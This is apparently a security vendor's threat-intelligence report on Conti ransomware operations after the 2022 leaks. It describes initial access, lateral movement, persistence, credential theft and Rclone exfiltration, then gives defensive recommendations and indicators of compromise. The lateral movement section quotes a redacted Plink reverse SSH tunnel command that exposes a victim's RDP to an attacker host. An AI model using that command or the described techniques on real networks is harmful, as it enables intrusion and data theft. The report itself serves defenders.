# Conti-nuation: methods and techniques observed in operations post the leaks **[research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/](https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/)** March 31, 2022 Authored by: Nikolaos Pantazopoulos, Alex Jessop and Simon Biggs ## Executive Summary In February 2022, a Twitter account which uses the handle ‘ContiLeaks’, started to publicly release information for the operations of the cybercrime group behind the Conti ransomware. The leaked data included private conversations between members along with source code of various panels and tools (e.g. Team9 backdoor panel [1]). Furthermore, even though the leaks appeared to have a focus on the people behind the Conti operations, the leaked data confirmed (at least to the public domain) that the Conti operators are part of the group, which operates under the ‘TheTrick’ ecosystem. For the past few months, there was a common misconception that Conti was a different entity. Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware. This post describes the methods and techniques we observed during recent incidents that took place after the Conti data leaks. Our findings can be summarised as below: Multiple different initial access vectors have been observed. The operator(s) use service accounts of the victim’s Antivirus product in order to laterally move through the estate and deploy the ransomware. ----- After getting access, the operator(s) attempted to remove the installed Antivirus product through the execution of batch scripts. To achieve persistence in the compromised hosts, multiple techniques were observed; Service created for the execution of Cobalt Strike. Multiple legitimate remote access software, ‘AnyDesk’, ‘Splashtop’ and ‘Atera’, were deployed. (Note: _This has been reported in the past too by different vendors)_ Local admin account ‘Crackenn’ created. (Note: This has been previously reported by Truesec _as a Conti behaviour [2])_ Before starting the ransomware activity, the operators exfiltrated data from the network with the legitimate software ‘Rclone’ [3]. It should be noted that the threat actor(s) might use different tools or techniques in some stages of the compromise. ## Initial Access Multiple initial access vectors have been observed recently; phishing emails and the exploitation of Microsoft Exchange servers. The phishing email delivered to an employer proceeded to deploy Qakbot to the users Citrix session. The targeting of Microsoft Exchange saw ProxyShell and ProxyLogon vulnerabilities exploited. When this vector was observed, the compromise of the Exchange servers often took place two – three months prior to the post exploitation phase. This behaviour suggests that the team responsible for gaining initial access compromised a large number of estates in a small timeframe. With a number of engagements, it was not possible to ascertain the initial access due to dwell time and evidence retention. However, other initial access vectors utilised by the Conti operator(s) are: Credential brute-force Use of publicly available exploits. We have observed the following exploits being used: Fortigate VPN CVE-2018-13379 CVE-2018-13374 Log4Shell CVE-2021-44228 Phishing e-mail sent by a legitimate compromised account. ## Lateral Movement In one incident, after gaining access to the first compromised host, we observed the threat actor carrying out the following actions: Download AnyDesk from hxxps://37.221.113[.]100/anydesk.exe Deployment of the following batch files: 1.bat, 2.bat, 111.bat Ransomware propagation Removesophos.bat, uninstallSophos.bat Uninstalls Sophos Antivirus solution Aspx.bat Contains a command-line, which executes the dropped executable file ‘ekern.exe’. ‘ekern.exe’ is a command line connection tool known as Plink [4] This file establishes a reverse SSH tunnel that allows direct RDP connection to the compromised host. _ekern.exe -ssh -P 53 -l redacted-pw redacted -R REDACTED_IP:59000:127.0.0.1:3389_ ----- After executing the above files, we observed the following utilities being used for reconnaissance and movement: RDP ADFind Bloodhound to identify the network topology. netscan.exe for network shares discovery. Cobalt Strike deployed allowing the threat actor to laterally move throughout the network. The common techniques across the multiple Conti engagements are the use of RDP and Cobalt Strike. ## Persistence The threat actor leveraged Windows services to add persistence for the Cobalt Strike beacon. The primary persistence method was a Windows service, an example can be observed below: _A service was installed in the system._ _Service Name: REDACTED_ _Service File Name: cmd.exe /c C:\ProgramData\1.msi_ _Service Type: user mode service_ _Service Start Type: demand start_ _Service Account: LocalSystem_ In addition, services were also installed to provide persistence for the Remote Access Tools deployed by the threat actor: AnyDesk Splashtop Atera Another Conti engagement saw no methods of persistence. However, a temporary service was created to execute Cobalt Strike. It is hypothesized that the threat actor planned to achieve their objective quickly and therefore used services for execution rather than persistence. In a separate engagement, where the initial access vector was phishing and lead to the deployment of Qakbot, the threat actor proceeded to create a local admin account named ‘Crackenn’ for persistence on the host. ## Privilege Escalation Conti operator(s) managed to escalate their privileges by compromising and using different accounts that were found in the compromised host. The credentials compromised in multiple engagements was achieved by deploying tools such as Mimikatz. One operator was also observed exploiting ZeroLogon to obtain credentials and move laterally. ## Exfiltration and Encryption Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software ‘Rclone’. ‘Rclone’ was configured to upload to either Mega cloud storage provider or to a threat actor controlled server. Soon after the data exfiltration, the threat actor(s) started the data ----- encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days. As discussed earlier on, the average dwell time of a Conti compromise is heavily dependant on the initial access method. Those incidents that have involved ProxyShell and ProxyLogon, the time between initial access and lateral movement has been three – six months. However once lateral movement is conducted, time to completing their objective is a matter of days. ## Recommendations Monitor firewalls for traffic categorised as filesharing Monitor firewalls for anomalous spikes in data leaving the network Patch externally facing services immediately Monitor installed software for remote access tools Restrict RDP and SMB access between hosts Implement a Robust Password Policy [5] Provide regular security awareness training ## Indicators of Compromise **Indicator Value** **Indicator** **Type** 37.221.113[.]100/anydesk.exe IP Address 103.253.208[.]79 IP Address **Description** Hosts AnyDesk Cobalt Strike commandand-control server C:\ProgramData\1.msi Filename Cobalt Strike payload C:\ProgramData\1.dll Filename Cobalt Strike payload 223.29.205[.]54 IP Address AnyDesk IP address of the operator. C:\Windows\sv.exe Filename Rclone C:\Windows\svchost.conf Filename Rclone config E03AF25994222D4DC6EFD98AE65217A03A5B40EEDCFFAC45F098E2A6F68F3F41 SHA256 Sv.exe – Rclone C:\Users\Public\Report_18.xls Filename Cobalt Strike payload ----- C:\Users\Public\x86_16.dll Filename Cobalt Strike payload Crackenn Account Local admin account created on patient zero C:\Users\\AppData\Roaming\Microsoft\Abevi\.dll Filename Qakbot payload C:\Users\Public\AdFind.exe Filename ADFind 23.82.140[.]234 IP Address 23.81.246[.]179 IP Address Cobalt Strike commandand-control server Cobalt Strike commandand-control server hijelurusa[.]com Domain Cobalt Strike commandand-control server ## References -----